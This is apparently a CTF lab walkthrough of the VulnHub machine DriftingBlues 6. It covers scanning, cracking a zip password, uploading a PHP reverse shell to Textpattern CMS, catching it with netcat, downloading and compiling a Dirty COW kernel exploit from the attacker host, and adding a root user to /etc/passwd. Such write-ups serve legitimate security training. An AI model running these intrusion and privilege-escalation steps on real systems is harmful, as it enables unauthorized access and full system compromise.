DRIFTINGBLUES: 6 WALKTROUGH
Today we are going to take another boot2root challenge known as “DRIFTINGBLUES-6”. The credit for making this vulhnub machine goes to ‘ tasiyanci’and it is another boot2root challenge in which our goal is to get root access to complete the challenge.
URL: https://www.vulnhub.com/entry/driftingblues-6,672/
Security Level: Easy
Scanning
# netdiscover -i vboxnet0
We found our Targets IP Address 192.168.56.162. Our next step is to scan our targets IP Address with nmap.
Enumeration
# nmap -v -sC -sV -sT -O -A -p- 192.168.56.162
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–06 17:40 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating ARP Ping Scan at 17:40
Scanning 192.168.56.162 [1 port]
Completed ARP Ping Scan at 17:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:40
Completed Parallel DNS resolution of 1 host. at 17:40, 0.35s elapsed
Initiating Connect Scan at 17:40
Scanning 192.168.56.162 [65535 ports]
Discovered open port 80/tcp on 192.168.56.162
Completed Connect Scan at 17:40, 1.90s elapsed (65535 total ports)
Initiating Service scan at 17:40
Scanning 1 service on 192.168.56.162
Completed Service scan at 17:41, 6.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.56.162
NSE: Script scanning 192.168.56.162.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.15s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.01s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Nmap scan report for 192.168.56.162
Host is up (0.00095s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
MAC Address: 08:00:27:97:52:E8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2–3.16
Uptime guess: 0.015 days (since Sun Jun 6 17:20:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.95 ms 192.168.56.162
NSE: Script Post-scanning.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser. Let’s explore the webpage ….!
So , Firstly i manually try and see /robots.txt file. In this file we see some entry like /textpattern/textpattern. We found Textpattern login page I try default user and password but nothing found. so i search some directory with gobuster command.
# gobuster dir -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.162 -x php
I go one by one directory and find some zip file in /spammer directory. Download zip file . Let’s time to extract it but it is password protect. In the spammer directory some credits.txt file. I use default password admin but it is wrong. I search on googled how to crack zip file.
# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt /root/Downloads/spammer.zip
And the password is myspace4. Let’s login to creadts.txt file.
Next we found 1 user name : mayer & 1 password : lionheart let’s login to textpattern cms.
Before upload the php file check the lhost and lport.
Time to upload php reverse shell.
Location:
Content > Files > Upload a php file.
We have successfully upload a php .Next step to run php-reverse-shell.php and take reverse shell. Run listner on attacker pc.
Php file Run location :-
$ http://192.168.56.162/textpattern/files/php-reverse-shell.php > file upload location
# nc -nlvp 443
We got a reverse shell.
Check TTY shell or not
# tty
Import tty shell :-
# python -c ‘import pty; pty.spawn(“/bin/bash”)’
Check Kernel Version
# uname -a
Linux driftingblues 3.2.0–4-amd64 #1 SMP Debian 3.2.78–1 x86_64 GNU/Linux
Search exploit on google. And it is vulnerable . I downlaod it.
Time to send .c file in victim machine.
# python -m SimpleHTTPServer 80 run on attacker machine
Back to Victim machine
# cd /tmp
# wget http://192.168.56.1/40839.c
# ls -lah
# gcc -pthread 40839.c -o dirty -lcrypt
# ./dirty
Please enter the new password: 12345
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: 7f3b4a2d5000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart’ and the password ‘12345’.
DON’T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
mmap: 7f3b4a2d5000
madvise 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart’ and the password ‘12345’.
DON’T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
After this we have a new firefart user.
# mv /tmp/passwd.bak /etc/passwd
# su firefart
Password :12345
# id
# cd /root
# cat flag.txt
WE HAVE DONE IT !!!!!!!!!